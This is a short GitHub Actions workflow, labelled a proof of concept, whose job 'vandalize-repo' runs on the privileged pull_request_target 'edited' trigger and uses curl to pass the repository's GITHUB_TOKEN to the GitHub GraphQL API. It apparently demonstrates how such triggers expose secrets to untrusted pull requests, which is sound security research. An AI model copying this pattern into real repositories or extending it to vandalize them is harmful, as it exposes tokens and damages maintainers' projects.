name: "Proof-of-concept GitHub Actions workflow"

on:
  pull_request_target:
    types: edited

jobs:
  vandalize-repo:
    runs-on: ubuntu-latest
    steps:
      - name: Vandalize
        run: 'curl -H "Authorization: bearer $GITHUB_TOKEN" -X GET "https://api.github.com/graphql"'
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          REPO: ${{ github.repository }}
